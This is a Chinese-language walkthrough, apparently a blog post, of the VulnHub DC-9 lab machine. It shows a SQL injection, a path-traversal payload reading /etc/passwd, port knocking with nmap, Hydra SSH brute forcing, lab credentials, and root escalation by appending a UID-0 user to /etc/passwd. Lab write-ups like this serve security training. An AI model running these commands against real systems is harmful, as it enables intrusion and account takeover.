vulnhub靶机 DC-9(渗透测试详解)

一、靶机信息收集

1、靶机下载

复制代码
https://download.vulnhub.com/dc/DC-9.zip

2、靶机IP扫描

3、探测靶机主机、端口、服务版本信息

4、靶机目录扫描

二、web渗透测试

1、访问靶机IP

查看页面功能点,发现一个搜索框和登录框

2、测试一下是否存在sql注入

查看当前数据库

进行账户密码枚举

Md5解密

尝试登录后台

看到页面中显示文件不存在,可能存在文件包含,尝试在当前url路径拼接

复制代码
?file=../../../../..//etc/passwd

尝试input方式写入木马,没有成功

3、之前扫描数据库时,发现有个users数据库,枚举出他的数据

看了文档说是要敲门,先访问配置文件/etc/knockd.conf

复制代码
敲门:敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来"敲门",使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来"关门",将端口关闭,不对外监听,进一步提升了服务和系统的安全性

然后再分别nmap扫描那三个端口,完成后再扫描22端口,就神奇的打开了

复制代码
nmap 192.168.31.161 -p 7469
nmap 192.168.31.161 -p 8475
nmap 192.168.31.161 -p 9842

再次扫描端口,发现22端口已开启

4、 将之前sql注入时得到的账号写入user.txt文件,密码写入pass.txt文件,并使用hydra工具进行爆破

复制代码
hydra -L user1.txt -P password1.txt 192.168.31.161 ssh

成功得到账户密码

5、ssh连接

经测试,只有janitor账户可以

复制代码
ssh janitor@192.168.31.161
Ilovepeepee

进入目录查看,发现存在几个密码

将其写入到 pass.txt 中,再次爆破,得到一个新的账号密码

复制代码
hydra -L user1.txt -P password1.txt 192.168.31.161 ssh
fredf:B4-Tru3-001

三、提权

1、 ssh 连接 fredf 用户,连接成功

查看当前权限

看到 /opt/devstuff/dist/test/test 能以 root 权限执行,进入目录,test 文件查看是乱码,在 /opt/devstuff 下发现 test.py

是一个脚本文件,生成一个用户,用root权限执行,将用户写入到 /etc/passwd 中

复制代码
openssl passwd -1 -salt dc9 123456

回到 /opt/devstuff/dist/test/ 目录,将账号密码写入 /tmp/dc9,再执行 test,将其写入到 /etc/passwd

复制代码
echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0::/root:/bin/bash' >> /tmp/dc9

sudo ./test /tmp/dc9 /etc/passwd

切换用户到 dc9,提权成功

相关推荐
Howie Zphile19 小时前
ch02-易经建模与应用-改善之道-模型篇
服务器·网络·数据库
我是koten20 小时前
在戴尔730服务器上安装CentOS操作系统
linux·运维·服务器·centos·装系统·戴尔服务器·戴尔730
春日见20 小时前
c++语法学习
linux·运维·服务器·人工智能·驱动开发
能年玲奈喝榴莲牛奶20 小时前
安全服务-网络安全培训服务
web安全·网络安全
图像僧20 小时前
【LINUX打不开vscode】linux上打不开vscode显示:Code的另一个实例正在运行但没有响应
linux
乔碧萝成都分萝20 小时前
二十、设备树
linux·驱动开发·嵌入式
C_心欲无痕20 小时前
网络相关 - 浏览器输 URL后发生的完整过程
前端·网络
阿拉斯加大闸蟹20 小时前
P4编程理论与实践
网络·架构
AllFiles20 小时前
Linux服务器磁盘在线扩容:使用fdisk调整分区大小实战
linux
YJlio20 小时前
Xshell连接(虚拟机)VMware Workstation 22(端口)错误的解决方案
linux·服务器·网络